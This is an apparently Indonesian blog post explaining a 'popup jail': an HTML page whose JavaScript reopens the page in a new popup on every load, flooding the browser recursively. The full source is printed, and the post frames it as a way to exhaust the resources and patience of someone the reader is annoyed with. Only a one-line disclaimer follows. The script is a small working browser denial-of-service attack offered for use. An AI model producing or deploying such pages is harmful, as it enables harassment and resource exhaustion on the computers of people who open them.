Halaman PopUp Jail

Coba lihat screen capture komputer saya ini:

 

 

banjir popup window

 

Gak kebayang kan kalo semua window itu menuhin layar dan bikin kita kehabisan resource plus kehilangan kesabaran?
Untungnya ada fasilitas dari browser untuk memblokir popup window dan javascript. Jadi kalo ada halaman web yang iseng seperti di atas, kita sedikit terlindungi, kecuali yang tidak mengaktifkan fiture tersebut (Di Mozilla masuk ke menu Tools –> Options –> Content –> Uncheck ‘Block PopUp Windows’, sedangkan di IE ada di menu Tools –> PopUp Blocker –> Turn Off PopUp Blocker)

Berikut ini adalah source file html sederhana yang bisa bikin kita (atau orang lain yang bikin kita kesel) kehabisan resource sekaligus kehilangan kesabaran:

<HTML>
<HEAD>
<SCRIPT LANGUAGE=”JavaScript”>

<!– Begin
function popUp(URL) {
day = new Date();
id = day.getTime();
eval(“page” + id + ” = window.open(URL, ‘” + id + “‘,

‘toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=10

0,height=75′);”);
}
</script>
</HEAD>

<BODY onLoad=”javascript:popUp(‘tes.html’)”>
Halaman iseng, muncul lagi!
</BODY>

</HTML>

script html di atas tinggal disave dengan nama “tes.html”. Bagian script yang di-bold adalah bagian yang membuat file jail itu meload dirinya sendiri dalam sebuah popup window setiap kali file diload ke browser. Dan voila! efeknya jadi rekursif kan? Alhasil ada yang kebanjiran popup window, kehabisan resource dan kehilangan kesabaran, hehehe…

Lagi-lagi, saya berpesan, info ini jangan disalah gunakan ya🙂

3 thoughts on “Halaman PopUp Jail

    1. waduh mas, saya juga baru belajar n baru tau, wakakaka…. thx dah mampir🙂 dah lama gak apdet nih, sooooo busy🙂

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s